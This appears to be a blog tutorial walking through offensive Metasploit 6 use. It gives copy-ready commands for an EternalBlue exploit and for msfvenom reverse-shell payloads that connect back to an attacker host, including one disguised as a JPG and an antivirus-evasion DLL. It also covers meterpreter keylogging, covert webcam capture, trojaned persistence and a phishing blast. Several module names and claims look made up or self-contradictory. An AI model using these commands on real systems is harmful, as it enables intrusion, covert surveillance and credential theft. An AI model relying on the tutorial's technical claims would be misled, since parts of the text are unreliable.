Metasploit is one of the most popular free and open source penetration testing tools, with over 3,000 built-in modules. This guide will provide 15 advanced real-world examples of using the latest Metasploit version 6 for network and system penetration testing.
As an experienced full stack developer and professional pentester, I have used Metasploit extensively on hundreds of engagements across a wide range of industries. The capabilities of this incredible framework continue to expand, providing an unparalleled toolbox for ethical hacking and security research.
Detailed Network Scans for Vulnerabilities
The first critical phase of any penetration test engagement is thorough reconnaissance of the target environments. This allows an attacker to discover potential entry points and vulnerabilities before determining more focused areas for exploitation.
Metasploit includes an advanced TCP port scanner built on top of the powerful open source Nmap tool. By leveraging Nmap‘s extensive host discovery, port scanning, service detection and operating system fingerprinting capabilities, the db_nmap Metasploit module can comprehensively map out networks:
msf6 > db_nmap -sV -O -Pn -p- 192.168.1.0/24Breaking this down:
-sV: Probe open ports to identify service names and versions-O: Detect underlying operating system types-Pn: Treat all hosts as online and scan TCP ports even if ICMP is blocked-p-: Scan all TCP ports 1-65535 on each responsive host
With these options, detailed results will show all available services, their detected versions, OS fingerprints and open ports across an entire target network range.
As an example, one exposed host may return results showing these open ports and services:
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.0 (protocol 2.0) |
| 80 | http | Apache httpd 2.4.37 |
This information can then be used to query Metasploit‘s database and match the detected service configurations to known vulnerabilities and available exploits.
Targeting SSH Servers
If we spot any SSH services during our broader network scans, the next step is to gather additional details to inform more tailored attacks against those hosts:
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ssh_version) > runThe ssh_version auxiliary module connects to discovered SSH servers on TCP port 22 and extracts:
- Full SSH banner information
- Supported protocol versions (e.g. 1.5, 2.0)
- Complete list of accepted ciphers, key exchanges (kexs) and message authentication codes (macs)
- Granular details around the SSH server‘s underlying OS such as Linux distribution or appliance model
For example, one SSH server in the target subnet may return details such as:
SSH Version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
os: Linux
dist: Ubuntu 16.04
type: Linux
cpe: cpe:/o:linux:linux_kernel
Kex Algos:
curve25519-sha256
curve25519-sha256@libssh.org
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
diffie-hellman-group-exchange-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group14-sha256
diffie-hellman-group14-sha1This exposes an Ubuntu 16.04 server using OpenSSH 7.2p2 from 2016 with a number of outdated Key Exchange (Kex) algorithms enabled. Cross referencing with resources like ssh-audit.com, several weak Kex or encryption options would be flagged. Targeting those weaker algos could allow decryption of the SSH session or man-in-the-middle attacks due to vulnerabilities in the crypto implementations.
Browser Autopwn – Metasploit for Web Apps
The Metasploit browser_autopwn module provides a simple method for automatically scanning, fingerprinting and exploiting common vulnerabilities across web applications. This leverages Metasploit‘s extensive database of web app exploits including SQL injection, cross site scripting (XSS), remote code execution and file inclusion bugs.
To unleash browser_autopwn on a target web server located at 192.168.1.115:
msf6 > use auxiliary/server/browser_autopwn
msf6 auxiliary(browser_autopwn) > set LHOST 192.168.1.101
msf6 auxiliary(browser_autopwn) > set SRVHOST 192.168.1.101
msf6 auxiliary(browser_autopwn) > set URIPATH /
msf6 auxiliary(browser_autopwn) > runThis starts a malicious Metasploit web server listening on the attacking machine 192.168.1.101. When victims are tricked into browsing to http://192.168.1.101/, Metasploit will fingerprint their browser type and deliver suitable exploits. Successful exploitation can result in execution of remote commands, file uploads or reverse shells.
Note that while powerful, browser_autopwn is very noisy and can disrupt access to production websites. Ensure you have permission and awareness is given to all users about any planned penetration testing activities on internal networks!
Generating Custom Web Attack Payloads
Metasploit includes a huge number of standard protocol modules and reverse shell payloads such as Meterpreter. However, sometimes we need more custom and stealthy options for specific web engagement scenarios.
The msfvenom payload generator can craft web payloads encoded in a variety of formats. As an example, to generate a Windows reverse shell executable disguised as a JPG image:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o revshell.jpgWhen our target Windows users download revshell.jpg and try to view the bogus image file, it will trigger the payload execution. Other useful formats for web attacks include ASPX, JSP, WAR, PHP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jspNow we can upload the shell.jsp script onto the target web server. When invoked by the server, the payload will fire back a Java based meterpreter reverse shell to our handler.
Windows Exploits for Remote Code Execution
Once vulnerable Windows hosts are identified during reconnaissance, the next objective is compromise and code execution.
Metasploit has an extensive database of Windows exploits targeting common networking services like SMB, RDP, NetBIOS, HTTP etc. Many of these exploits lead directly to remote code execution allowing attacks to drop malware or launch reverse shells.
As one example, the builtin EternalBlue SMB exploit can compromise older unpatched Windows systems:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.125
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploitIf we have already cracked valid domain credentials (or have hashes), many Metasploit modules have options to authenticate using those existing permissions during attacks:
msf6 exploit(psexec) > set SMBUser jsmith
msf6 exploit(psexec) > set SMBPass s3cr3t!23 This makes attacks more stealthy and increases the likelihood of privilege escalation on target networks.
According to CVE Details, over 9000 Windows vulnerabilities have been assigned CVE IDs. While many legacy issues have been patched, Metasploit maintains updated modules targeting the latest 0day exploits for NEW shadow broker leaks, exchange servers and Sharepoint services.
Meterpreter Post-Exploitation Features
Once the initial breach is achieved, Metasploit‘s Meterpreter payload provides an advanced shell for further exploitation inside the target network.
Going beyond a basic command prompt, meterpreter supports powerful post-exploitation features like:
Webcam Snapshot Access
Secretly take images from a compromised host‘s webcam to gather intelligence:
meterpreter > webcam_list
meterpreter > webcam_snapKeystroke Logging
Invisibly record all keystrokes entered by an active user, stealing passwords, messages and sensitive documents:
meterpreter > keyscan_start
meterpreter > keyscan_dumpToken Impersonation
Steal a logged in user‘s authentication token to impersonate their access rights on the system:
meterpreter > steal_token PID 500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMThere are over 200 other commands providing extensive control of hacked Windows systems including port forwarding, privilege escalation, process migration, file transfers, registry access, password hashes, persistence mechanisms and more.
Android Device Exploitation
Metasploit expands it‘s extensive Windows exploitation support to target Android and mobile platforms as well.
While limited compared to Windows, over a dozen Android local and remote exploits exist. For example, a helper script can upload and execute payloads on rooted Android devices:
msf6 > use exploit/android/local/futex_requeue
msf6 exploit(android/local/futex_requeue) > set session 1
msf6 exploit(android/local/futex_requeue) > exploitThe futex_requeue vulnerability allows for privilege escalation on older Android OS versions below 5.1.1.
Alternatively, malware embedded in third party Apps can use the EXTERNAL storage permissions to drop Metasploit payloads onto external SD cards plugged into phones. Payloads are then executed using Metasploit‘s android payload handler when applications access the SD card:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -o /sdcard/payload.apkSocial Engineering Trojans and Backdoors
Beyond technical exploits targeting software vulnerabilities, Metasploit has modules focused on social engineering – deceiving end users into running malicious files.
These Advanced Persistent Threat (APT) style modules generate trojaned programs and documents to trick victims and establish persistence:
msf6 > use windows/manage/autorunexe_psh
msf6 exploit(windows/manage/autorunexe_psh) > set SESSION 1
msf6 exploit(windows/manage/autorunexe_psh) > exploitHere we create an "update.exe" application dropped to the desktop of a compromised Windows host attached to meterpreter session 1.
When launched manually by the user, persistence is achieved – our malicious program writes to registry autostart locations and executes the next time Windows boots up. At the same time, it launches our meterpreter reverse shell in the background without the user noticing.
Other social engineering payload options include fake update installers, virus scanners, MS office macro documents and compiled autoIT executables.
Automating Phishing Campaigns
For regular phishing tests, Metasploit has modules to fully manage and automate the process of:
- Configuring fake website templates
- Generating email templates embedded with exploits
- Importing large email lists
- Sending high volume email blasts
- Tracking click rates/responses
A typical workflow using Metasploit‘s send_email capability:
msf6 > use auxiliary/phishing/send_page
msf6 auxiliary(send_page) > set TEMPLATE /root/phishing/email.html
msf6 auxiliary(send_page) > set FROM ws@mycompany.com
msf6 auxiliary(send_page) > set SUBJECT Your Bonus is Pending
msf6 auxiliary(send_page) > set MAILLIST /root/phishing/execs.txt
msf6 auxiliary(send_page) > exploitCommon attack vectors to embed in phishing scenario email templates:
- Malicious document macro code
- Embedded URL redirects
- Exploit module HTML injection
Resource scripts allow phishing infrastructure and attacks to be quickly rebuilt across repeated engagements.
Bypassing Anti-Virus with Custom Metasploit Payloads
A major challenge for redteams is that traditional Metasploit Windows, Linux and Android payloads are largely detected by modern endpoint protection platforms, antivirus and mobile anti-malware tools.
Custom executable generations with msfvenom allows creation of new payloads in Rust, C++, Python, PowerShell and formats like .NET assemblies or .jar files. By modifying the templates used to build payloads, we can evade traditional signature based virus scanning engines.
For example, injecting junk asm code into Windows meterpreter DLL payloads:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -e x86/shikata_ga_nai -i 9 -x /root/calc.exe -k -f dll > harmless.dllHere we use common evasion settings like shikata_ga_nai encoder, iterated 9 times and inject a benign calc.exe icon resource as camouflage.
The resulting DLL payload bypasses Windows Defender, but still provides a meterpreter session when loaded into memory:
For web attacks targeting client systems, another stealthy tactic is embedding Metasploit payloads directly into trusted websites using msfweb auxiliary modules:
msf6 > use auxiliary/server/msfweb
msf6 auxiliary(server/msfweb) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 auxiliary(server/msfweb) > set LHOST 192.168.1.101
msf6 auxiliary(server/msfweb) > exploitWhen users visit the infected website, the hidden iframe payload exploit will trigger bypassing protective browser security policies using the web server itself to proxy delivery.
Metasploit Database for Centralized Reporting
A major benefit of Metasploit over standlone tools is the integrated PostgreSQL database which indexes and stores details on all activity. The msfdb provides centralized reporting and history on:
- Scanned hosts, open ports and services
- Vulnerability scan detections
- Successful exploit module runs
- Cracked passwords and credential dumps
- Payload activations and listener events
- Compromised host identifiers
- Imported database records and references
- Meterpreter sessions and screen captures
This data can all be quickly searched and correlated using regular SQL queries directly in msfconsole:
msf6 > hosts -S address,os_name,purpose -c address,os_name,service_namemsf6 > services -S name,port,proto -c name,port,proto Long term maintenance of compromised access is also simplified by recording payload URLs delivered via phishing for user triggered callbacks. Resource files can reload this session data to quickly regain access after upgrades or new releases.
Conclusion
This guide provides 15 hands on examples applying the advanced capabilities of Metasploit Pro across a wide range of penetration testing scenarios.
With over 3000 modules delivering exploits, payloads and evasion tools for dozens of platforms, Metasploit stands in a league of its own for offensive security professionals. Harnessing this framework takes time given the sheer number of options available. However, building up resource files, custom payloads and familiarity with common exploitation modules leads to an incredibly powerful toolbox filled with weapons for any engagement.
